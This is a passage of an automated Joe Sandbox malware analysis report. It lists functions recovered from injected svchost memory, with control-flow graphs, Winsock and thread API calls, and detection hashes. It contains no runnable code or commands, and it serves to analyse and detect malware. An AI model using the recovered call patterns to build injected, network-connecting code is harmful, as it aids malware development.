                                                                                                                                                                                • Instruction Fuzzy Hash: F9312A74A01204DFEB14DFA4DA98B9DB7B5FB44304F54C598E809BB280D779AE80DB51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 115 4001160-4001178 socket 116 4001182-40011a9 htons gethostbyname 115->116 117 400117a-400117d 115->117 119 40011ba-40011bd 116->119 120 40011ab-40011d4 116->120 118 4001259-400125c 117->118 119->118 122 40011df-40011e5 120->122 123 4001202-4001208 122->123 124 40011e7-40011f8 connect 122->124 127 4001218-400121c 123->127 128 400120a-4001216 closesocket 123->128 125 4001200 124->125 126 40011fa-40011fe 124->126 125->122 126->123 129 4001256 127->129 130 400121e-4001251 setsockopt * 2 127->130 128->118 129->118 130->129
                                                                                                                                                                                APIs
                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                • htons.WS2_32(?), ref: 04001190
                                                                                                                                                                                • gethostbyname.WS2_32(?), ref: 0400119D
                                                                                                                                                                                • connect.WS2_32(000000FF,?,00000010), ref: 040011F1
                                                                                                                                                                                • closesocket.WS2_32(000000FF), ref: 0400120E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 530611402-0
                                                                                                                                                                                • Opcode ID: 3d9d7dafa64235843ffb934672811fee420f5a57adc05dc76075f4ea8ad417e8
                                                                                                                                                                                • Instruction ID: 08c5e0426ad4df4722dd3bdfc990c85badbf8b170f181f32ce41d694214c1be1
                                                                                                                                                                                • Opcode Fuzzy Hash: 3d9d7dafa64235843ffb934672811fee420f5a57adc05dc76075f4ea8ad417e8
                                                                                                                                                                                • Instruction Fuzzy Hash: 66315070A00259EBEB14DFA4C845BEEB7B6BF48318F108649E5617F2C0E7B6A9408751
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                  • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 0400160F
                                                                                                                                                                                  • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                  • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                • String ID: F
                                                                                                                                                                                • API String ID: 900668384-1304234792
                                                                                                                                                                                • Opcode ID: e6bc4524acd37c5f2a61d60cd04ada7e2da9e6c79a86eb7b70bf2b9ee635fd7d
                                                                                                                                                                                • Instruction ID: d79780824819048788ded504410e9a552de5875a97c05552d19a965bcf11c014
                                                                                                                                                                                • Opcode Fuzzy Hash: e6bc4524acd37c5f2a61d60cd04ada7e2da9e6c79a86eb7b70bf2b9ee635fd7d
                                                                                                                                                                                • Instruction Fuzzy Hash: 053152B5D41218EBEB20EF94DC49BD973B4AB14308F0482D9E5197A2C1E7766F848F91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                  • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 0400160F
                                                                                                                                                                                  • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                  • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                • String ID: F
                                                                                                                                                                                • API String ID: 900668384-1304234792
                                                                                                                                                                                • Opcode ID: 3f257ec96778accae7db7852b0fbcac80dd7221c206c2323f8e06a36ea41de21
                                                                                                                                                                                • Instruction ID: efc04feaa42e0dd8c691736b9f02f641cbb91c62c4f6f354fde5ae11d8ba4a5d
                                                                                                                                                                                • Opcode Fuzzy Hash: 3f257ec96778accae7db7852b0fbcac80dd7221c206c2323f8e06a36ea41de21
                                                                                                                                                                                • Instruction Fuzzy Hash: 423132B5D41218ABEB20EFA4DC89BD973B4AB18308F0482D5E5197A181E6756F84CF51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                  • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 0400160F
                                                                                                                                                                                  • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                  • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                • String ID: F
                                                                                                                                                                                • API String ID: 900668384-1304234792
                                                                                                                                                                                • Opcode ID: cf3c1adff95c02d838a93fa7c3e08858ca76797544e8a022648dccf564d39913
                                                                                                                                                                                • Instruction ID: 6ed18f16ab0dd41aabad2fa4162e749fae483d95e79aad030a55c0feddf4590a
                                                                                                                                                                                • Opcode Fuzzy Hash: cf3c1adff95c02d838a93fa7c3e08858ca76797544e8a022648dccf564d39913
                                                                                                                                                                                • Instruction Fuzzy Hash: 383164B5D4021CABEB24EF94DC88BD97374AB18308F0482D8E51D7A181EB75AF84CF51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 04001490: lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                  • Part of subcall function 04001490: GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                  • Part of subcall function 04001490: closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040017E6
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 0400188B
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 04001963
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04001976
                                                                                                                                                                                • Sleep.KERNEL32(00009C40), ref: 04001981
                                                                                                                                                                                  • Part of subcall function 04001DC0: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 04001E14
                                                                                                                                                                                  • Part of subcall function 04001470: GetProcessHeap.KERNEL32(00000008,?), ref: 04001479
                                                                                                                                                                                  • Part of subcall function 04001470: RtlAllocateHeap.NTDLL(00000000), ref: 04001480
                                                                                                                                                                                • Sleep.KERNEL32(00007530), ref: 04001990
                                                                                                                                                                                • WSACleanup.WS2_32 ref: 0400199B
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 040019A2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create$HeapProcessSleepThread$AllocAllocateCleanupCountEventExitObjectSingleTickVirtualWaitclosesocketlstrcat
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3000315311-0
                                                                                                                                                                                • Opcode ID: ed75c3485ee5f6438b7b72692c8e44a361812d41e5d2ef45d7a2c52b189860e4
                                                                                                                                                                                • Instruction ID: ecbd1e530684247b239ee6e1b256228db756e23c6e027602103708aff6be2e82
                                                                                                                                                                                • Opcode Fuzzy Hash: ed75c3485ee5f6438b7b72692c8e44a361812d41e5d2ef45d7a2c52b189860e4
                                                                                                                                                                                • Instruction Fuzzy Hash: 84410674A012289FFB60DF14DC95BDAB7B0AB4A708F1480E8E5497B2C4D7756E80CF46
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 294 4001040-400104a 295 4001052-4001054 294->295 296 400104c-4001050 294->296 298 40010d3-40010d6 295->298 296->295 297 4001056 296->297 299 400105d-4001061 297->299 300 4001063-4001065 299->300 301 4001067-4001084 recv 299->301 300->298 302 4001086-400108c 301->302 303 400109f-40010a3 301->303 302->303 304 400108e-4001092 302->304 305 40010a5 303->305 306 40010a7-40010ab 303->306 304->303 307 4001094-400109d GetTickCount 304->307 308 40010c3-40010c7 305->308 309 40010ad 306->309 310 40010af-40010c1 306->310 307->303 311 40010d1 308->311 312 40010c9-40010cf 308->312 309->308 310->299 311->298 312->311
                                                                                                                                                                                APIs
                                                                                                                                                                                • recv.WS2_32(?,00000000,?,00000000), ref: 04001078
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 04001094
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTickrecv
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1874678310-0
                                                                                                                                                                                • Opcode ID: 6b4986c91a39f45b3505869805ead1539d7754d72571547b31f3d810936fcdc1
                                                                                                                                                                                • Instruction ID: 449e92a0b18f183db0f7345c8df75c2f30566562dbb85a03ceabff6c1882a85f
                                                                                                                                                                                • Opcode Fuzzy Hash: 6b4986c91a39f45b3505869805ead1539d7754d72571547b31f3d810936fcdc1
                                                                                                                                                                                • Instruction Fuzzy Hash: B821F274900299EFEF10CFA4D4447AE7BF1AF04309F108559E8456B281D7B6AA94DB92
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 313 40010e0-40010ea 314 40010f2-40010f4 313->314 315 40010ec-40010f0 313->315 317 400114d-4001150 314->317 315->314 316 40010f6 315->316 318 40010fd-4001101 316->318 319 4001103-4001120 send 318->319 320 400113a-400114b send 318->320 321 4001122-4001124 319->321 322 4001126-4001138 319->322 320->317 321->317 322->318
                                                                                                                                                                                APIs
                                                                                                                                                                                • send.WS2_32(?,00000000,?,00000000), ref: 04001114
                                                                                                                                                                                • send.WS2_32(?,00000000,00000000,00000000), ref: 04001146
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: send
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2809346765-0
                                                                                                                                                                                • Opcode ID: b2e598ef71c8ac5d0c56a500729e24b321e62eb8f582e8b020920d41a4434bf5
                                                                                                                                                                                • Instruction ID: 7140d396e4fa338b1c45032ebff5f33e510887e1da457bfc48643044175dbf3e
                                                                                                                                                                                • Opcode Fuzzy Hash: b2e598ef71c8ac5d0c56a500729e24b321e62eb8f582e8b020920d41a4434bf5
                                                                                                                                                                                • Instruction Fuzzy Hash: 80012234A00348FBEF14CFA8D845BEE77B4AB44318F10C658E9656B2C0D7B6A651EB91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 323 40013b0-40013c1 324 4001421-4001427 323->324 325 40013c3-40013c7 323->325 325->324 326 40013c9-40013d0 325->326 327 40013db-40013e1 326->327 328 4001411-400141a 327->328 329 40013e3-400140f QueryPerformanceCounter Sleep 327->329 328->324 330 40013d2-40013d8 329->330 330->327
                                                                                                                                                                                APIs
                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                • Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2875609808-0
                                                                                                                                                                                • Opcode ID: a7db8480fdc823d777aef3822c45b88b551d9c425098c02d9d2f571069091408
                                                                                                                                                                                • Instruction ID: 9d74403c1c2c7bb1751bbbba9dc0b5917814bf527727232baae25755bbc2d242
                                                                                                                                                                                • Opcode Fuzzy Hash: a7db8480fdc823d777aef3822c45b88b551d9c425098c02d9d2f571069091408
                                                                                                                                                                                • Instruction Fuzzy Hash: 18011A30904208EBEB01CF98D494BEDBBB1FF44308F14C098E9496B381D379AA84CB81
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 331 4011cd-4011e4 332 401253-401255 331->332 333 4011e6-4011e9 331->333 334 4011ea-4011ef 333->334 335 4011f1-401204 LoadLibraryExA 334->335 336 40124a-40124f 334->336 335->332 337 401206-40120d 335->337 336->332 338 401212-401218 337->338 339 40120f 337->339 340 40121b-40121f 338->340 339->338 341 401221-401224 340->341 342 401226-40122b 340->342 341->334 343 401235 342->343 344 40122d-401233 342->344 345 40123a-401248 343->345 344->345 345->340
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 004011FC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.675966025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_400000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                • Opcode ID: 1d8c67a6fd8a031ce9178923ff6fa604b01da3edc277bbd736844eb450087ab7
                                                                                                                                                                                • Instruction ID: 35013e2e2bdfb2c25cf3a4b33a37da36620c85c937569e224cb1d264aff8bf43
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d8c67a6fd8a031ce9178923ff6fa604b01da3edc277bbd736844eb450087ab7
                                                                                                                                                                                • Instruction Fuzzy Hash: B5114872944205AFDF10CF44C8C0B9A37A4AF15354F2981B9EC19FB3A2D374EE148B99
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00401144
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.675966025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_400000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                • Opcode ID: f46dcd975488781c9cddb351eca70577c1689cc1756a23961b888947e9d6707a
                                                                                                                                                                                • Instruction ID: 6f389262607e94f6ca6fd2432eff30f66c048e0178ed9f8f27be01fdfe11bbb9
                                                                                                                                                                                • Opcode Fuzzy Hash: f46dcd975488781c9cddb351eca70577c1689cc1756a23961b888947e9d6707a
                                                                                                                                                                                • Instruction Fuzzy Hash: 02115E32600615ABCB21DF64CD81B8BB7F4AF09324F144469AA1ABB691D771FA00DB88
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strcpy_s$_memset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 987253425-0
                                                                                                                                                                                • Opcode ID: 44218adf272bf707b1ed20d16bc8d9ad3aaffc81e79ba637950d93952a6c6a75
                                                                                                                                                                                • Instruction ID: 6ffbbe254bd13291fa03b93f874eca1d4a54b98d90e1905f46e8f856855b0833
                                                                                                                                                                                • Opcode Fuzzy Hash: 44218adf272bf707b1ed20d16bc8d9ad3aaffc81e79ba637950d93952a6c6a75
                                                                                                                                                                                • Instruction Fuzzy Hash: DC7172B6E04208FBDF50DF94EC818DEB7B4AB4A609F20C459F90976290D135BA48EB56
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: H
                                                                                                                                                                                • API String ID: 0-2852464175
                                                                                                                                                                                • Opcode ID: 1096477fb5db0565c6f2c143114047529f305e68e65e65c6dd9e52626ccf8a70
                                                                                                                                                                                • Instruction ID: 67b441bc6219ad25058a7dc751711c58666b968fd0b66db19d5699bc980d0709
                                                                                                                                                                                • Opcode Fuzzy Hash: 1096477fb5db0565c6f2c143114047529f305e68e65e65c6dd9e52626ccf8a70
                                                                                                                                                                                • Instruction Fuzzy Hash: 8FF119B8E00218DFEB14DFA8D990B9DB7B1FF48308F248199D909AB361D771A985CF41
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memset
                                                                                                                                                                                • String ID: <
                                                                                                                                                                                • API String ID: 2102423945-4251816714
                                                                                                                                                                                • Opcode ID: fd79b48e9fbb9cb9cfac3a3da6eef3a913ec469d5d91857583c19bc0bafd63dd
                                                                                                                                                                                • Instruction ID: 265d75645d11992da4b2f1f59cc45b6cd644182446f2ee9bce3e1a8d4e2d5750
                                                                                                                                                                                • Opcode Fuzzy Hash: fd79b48e9fbb9cb9cfac3a3da6eef3a913ec469d5d91857583c19bc0bafd63dd
                                                                                                                                                                                • Instruction Fuzzy Hash: D11209B5A012289FEB64DF54CD88BEEB7B9BB48704F1041D9E609B7280D7746AC4CF58
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memcmp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2931989736-0
                                                                                                                                                                                • Opcode ID: 4ab6c835b3a8d386f7d6cb5b157b7cd7d659ba90d45b0f81057a5aa373f928b3
                                                                                                                                                                                • Instruction ID: 1232f30742209602bb969d2521b285a9e46184637cee8bf4b984800216b21bdb
                                                                                                                                                                                • Opcode Fuzzy Hash: 4ab6c835b3a8d386f7d6cb5b157b7cd7d659ba90d45b0f81057a5aa373f928b3
                                                                                                                                                                                • Instruction Fuzzy Hash: 0EF125B0E04219DFDB14DFA8D894BEEBBB1BF48308F148119E415BB2A5D774AA41CF91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: codecvt
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3662085145-0
                                                                                                                                                                                • Opcode ID: 481a094063eea0996d580fe575330a3dfc80b192d07c727697d1ca0252fb713b
                                                                                                                                                                                • Instruction ID: a3cb5fddb2616e01ffbd0549c63a57f7e4090b46a873f7d090d06a3cf8222b0d
                                                                                                                                                                                • Opcode Fuzzy Hash: 481a094063eea0996d580fe575330a3dfc80b192d07c727697d1ca0252fb713b
                                                                                                                                                                                • Instruction Fuzzy Hash: C5E18374A00328DFDB58CF94D998BADBBB2BF49308F244159D8096B391D776AD86CF40
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 97f17c946a3c54a9cad3e83d6fdf94190c77b8b4620ad00b5b108f5948b5f234
                                                                                                                                                                                • Instruction ID: a5d7251e2747225a00ddcb09f2389310aff70beb4688250c6b3f934d2e6ae519
                                                                                                                                                                                • Opcode Fuzzy Hash: 97f17c946a3c54a9cad3e83d6fdf94190c77b8b4620ad00b5b108f5948b5f234
                                                                                                                                                                                • Instruction Fuzzy Hash: 0491C6B4E00229EFDB08DF94D594BAEBBB1BF88308F148059E9157B390DB75A941CF91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • _memset.LIBCMT ref: 04021A91
                                                                                                                                                                                • _memset.LIBCMT ref: 04021AB5
                                                                                                                                                                                • _memset.LIBCMT ref: 04021B49
                                                                                                                                                                                • _memset.LIBCMT ref: 04021B62
                                                                                                                                                                                  • Part of subcall function 040217B0: _memset.LIBCMT ref: 040217EA
                                                                                                                                                                                  • Part of subcall function 040217B0: _memset.LIBCMT ref: 04021800
                                                                                                                                                                                  • Part of subcall function 040217B0: _memset.LIBCMT ref: 0402181A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.708140825.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                • Associated: 0000000B.00000002.708140825.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memset
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 2102423945-2766056989
                                                                                                                                                                                • Opcode ID: e94b19ba0fcb669e4e0cbc5759ced8619370a39b6899ccf5e07f60b5a10fbc88
                                                                                                                                                                                • Instruction ID: 01bcd26e004969603b563e094358f1b64e43344fbc446aa7b287e43a94b7a553
                                                                                                                                                                                • Opcode Fuzzy Hash: e94b19ba0fcb669e4e0cbc5759ced8619370a39b6899ccf5e07f60b5a10fbc88
